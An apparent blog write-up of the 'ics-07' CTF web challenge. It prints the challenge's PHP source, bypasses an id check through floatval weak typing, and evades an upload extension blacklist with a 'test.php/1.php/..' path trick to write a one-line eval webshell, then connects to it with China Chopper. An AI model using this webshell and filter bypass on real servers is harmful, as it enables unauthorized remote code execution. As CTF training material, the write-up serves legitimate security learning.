linux系统过滤文件类型,攻防世界-web-ics-07(PHP弱类型、linux目录结构特性绕过文件类型过滤)...

最新推荐文章于 2022-07-26 20:25:10 发布
最新推荐文章于 2022-07-26 20:25:10 发布
阅读量176 收藏
点赞数
文章标签: linux系统过滤文件类型

工控云管理系统项目管理页面解析漏洞。

进入题目后,点击进入项目管理页面。

87175fd25579f0014bcf2a88944d1599.png

点击view-source查看源码。

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

cetc7

session_start();

if (!isset($_GET[page])) {

show_source(__FILE__);

die();

}

if (isset($_GET[page]) && $_GET[page] != 'index.php') {

include('flag.php');

}else {

header('Location: ?page=flag.php');

}?>

page :id :

view-source

if ($_SESSION['admin']) {

$con = $_POST['con'];

$file = $_POST['file'];

$filename = "backup/".$file;

if(preg_match('/.+.ph(p[3457]?|t|tml)$/i', $filename)){

die("Bad file extension");

}else{

chdir('uploaded');

$f = fopen($filename, 'w');

fwrite($f, $con);

fclose($f);

}

}?>

if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {

include 'config.php';

$id = mysql_real_escape_string($_GET[id]);

$sql="select * from cetc007.user where id='$id'";

$result = mysql_query($sql);

$result = mysql_fetch_object($result);

} else {

$result = False;

die();

}

if(!$result)die("
something wae wrong !
");

if($result){

echo "id: ".$result->id."";

echo "name:".$result->user."";

$_SESSION['admin'] = True;

}?>

View Code

1 代码解析:发现漏洞

下面对代码进行解析。关键代码有3段。

第一段

如果传入的参数page的值不是index.php,则包含flag.php,否则重定向到?page=flag.php。

}if (isset($_GET[page]) && $_GET[page] != 'index.php') {include('flag.php');

}else{header('Location: ?page=flag.php');

}?>

第二段

在$_SESSION['admin'] = True的情况下,POST提交con和file两个参数,对$filename进行正则判断,如果判断正确文件会被上传到uploaded/backup目录下。正则匹配这里把一些后缀加入了黑名单

}else{chdir('uploaded');$f = fopen($filename, 'w');fwrite($f, $con);fclose($f);

}

}?>

第三段

这一段可以使$_SESSION['admin'] = True;我们来看一下怎么构造。他需要获取一个id参数, 并且id不为1,且最后一位等于9。

这里用到了floatval这个函数,floatval 函数用于获取变量的浮点值,但是floatval在遇到字符时会截断后面的部分,比如-,+,空格等,所以可以构造id=1 9来满足第一个if条件,if条件满足可以使得$result变量为TRUE。成功使$_SESSION['admin'] = True;

}else{$result = False;die();

}if(!$result)die("
something wae wrong !
");if($result){echo "id: ".$result->id."";echo "name:".$result->user."";$_SESSION['admin'] = True;

}?>

2 构造payload:上传木马

下面考虑如何上传木马文件。这里利用Linux的一个目录结构特性。我们递归的在1.php文件夹中再创建2.php,访问1.php/2.php/..进入的是1.php文件夹

7e04e366f937526f13908ec98372fad0.png

payloa如下

con=<?php @eval($_POST[muma]);?>&file=test.php/1.php/..

d42cf1aaba5d415791648d4c79e3b8f7.png

注意这里page参数的值不能为flag.php,否则是上传不成功的。

访问/uploaded/backup/目录,发现上传成功。

42cb30dbfcfb7c3f3cb4cc2e2d30aacc.png

3 菜刀连接:获取flag

上菜刀。

ea08c7cb9c24bf2892dc3fa092a6d3a0.png

L NEO
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux-文件查找和内容过滤命令
07-25
linux-文件查找和内容过滤命令。linux-文件查找和内容过滤命令。
linux过滤某一类型文件,Linux下遍历某一类型文件
weixin_42554408的博客
05-15 173
Linux下遍历文件夹内所有文件并将需要文件地址添加到链表中:闲话少序,直接上代码#include #include #include #include #include #includeusing namespace std;/*************************************************************************************...
linux-文件过滤及编辑处理命令总结
weixin_43042859的博客
08-24 647
1-cat 查看文件内容或合并文件。 常用功能: 1)cat file.txt 查看文件内容 2)cat file1.txt file2.txt &amp;gt;newfile.txt 合并成新文件(不算常用) 3)cat&amp;gt;&amp;gt;file.txt&amp;lt;...
Linux 文件查找和内容过滤命令
wojiao228925661的博客
08-28 3866
Linux 文件查找和内容过滤命令 linux 文件查找和内容过滤命令 grep、fgrep和egrep命令   这组命令以指定模式搜索文件,并通知用户在什么文件中搜索到与指定的模式匹配的字符串,并打印出所有包含该字符串的文本行,在该文本行的最前面是该行 所在的文件名。grep命令一次只能搜索一个指定的模式;egrep命令检索扩展的正则表达式(包括表达式组和可选项);fgrep命令检索固定字符...
Web_php_include(strstr与str_replace函数)
sGanYu
08-24 1236
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);#查找php://,null替换查找的值,并且规定搜索$page } include($page); ?> strstr函数 strstr(str1,str2) 函数,判断字符串str2是否是s...
kali-linux-2021.3-installer-amd64.part1.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
attacklab-12-选择集过滤.ev4.rar
最新发布
05-26
【标题】"attacklab-12-选择集过滤.ev4.rar" 涉及的是一个与网络安全相关的教学资源,特别是关于选择集过滤的实践案例。选择集过滤是一种防止SQL注入攻击的技术,它在数据库查询中限制了可接受的输入值,从而增强了...
商业编程-源码-缓冲区溢出攻防.zip
06-23
《商业编程-源码-缓冲区溢出攻防》是一个重要的主题,特别是在软件安全领域。缓冲区溢出是计算机程序中常见的安全漏洞,它源于程序员在处理数据输入的疏忽,可能导致系统崩溃、数据丢失,甚至允许攻击者执行恶意...
计算机病毒攻防论文-(精选).pdf
11-17
计算机病毒攻防论文-(精选).pdf
基于Linux的IP地址的动态分配--DHCP SERVER.pdf
09-06
【基于Linux的IP地址动态分配——DHCP SERVER】 在计算机网络环境中,手动配置IP地址可能会导致IP冲突,影响网络的正常运行。为了解决这个问题,动态主机配置协议(DHCP)应运而生。DHCP SERVER是实现IP地址动态...
CTFshow web入门——php特性
小元砸的博客
02-20 5353
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
Linux笔记五 grep文件过滤、find文件/目录查找
weixin_42422095的博客
07-26 5084
但是locate是在/var/mlocate/mlocate.db文件里面查找指定文件的路径,而find则是在指定目录下递归查找符合指定条件的文件相比较于locate更详细。当我们查看文件候往往会有一些很大的文件,但是我们需要查看的数据只有小小的一部分,这个候我们就需要用到文件内容过滤来高速简洁的查找到自己需要的信息。用于查找指定文件中符合条件的字符串,可以用正则表达式搜索文件中的字符串,并将匹配的字符串打印出来。find命令有着自己的额外处理命令。-exec处理命令{}\;......
攻防世界----ics-07
qq_44418229的博客
07-26 395
攻防世界---ics-07 分析源码+正则
攻防世界练习题web
果果的csdn
06-12 1127
虽然是考试周,可是实在不想天天刷题,写写CTF,承包一整天的快乐。 工控云管理系统项目管理页面解析漏洞 打开题目,到源码,进行审计。 <?php if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'conf...
Ubuntu服务器下apache2无法解析html中的php代码的问题
小奶牛的博客
04-26 5810
切换到Apache2的配置文档里 cd  /etc/apache2/mods-available/ 找到对应的php配置的文档我的是php7.0版本所以对应php7.0.conf vi php7.0.conf 文件基本如下,我们要做的是改掉第一行的正则表达式,在p的前面加一个?就能解决问题了 ph(p[3457]?|t|tml)$"> // 改成".+\.p?h(p[3457]?|
攻防世界-web-ics-07-从0到1的解题历程writeup
CTF小白的博客
04-17 3359
题目分析 首先拿到题目描述:工控云管理系统项目管理页面解析漏洞 找到题目入口 点击view-source对源码进行审计 if (isset($_GET[page]) && $_GET[page] != 'index.php') {      include('f...
php 操作系统之间的一些黑魔法(绕过文件上传a.php/.)
3569
01-02 7674
http://wonderkun.cc/index.html/?p=6260x00 前言做了一个CTF题目,遇到了一些有趣的东西,所以写了这篇文章记录了一下。 但是我却不明白造成这个问题的原因在哪里,所以不知道给文章起什么标题,就姑且叫这个非常宽泛的名字吧。0x01 CTF题目原型在遇到的题目中,最后一步是getshell,大概可以简化为以下代码: // 测试环境 linux + apache2
攻防世界WEB】难度五星15分进阶题:ics-07
07-24 565
攻防世界WEB】五星15分
攻防世界web进阶区刷题记录(1)
bmth666的博客
03-27 4649
文章目录webbaby_webTraining-WWW-Robotsphp_rceWeb_php_include方法1方法2方法3warmupNewsCenter web baby_web 提示是:想想初始页面是哪个 进入是一个hello world,然后就没有了,由于提示试试抓包,得到flag Training-WWW-Robots 由于提示我们就查看robots.txt 获得flag p...
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过绕过筛选器,构造如下 URL: ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值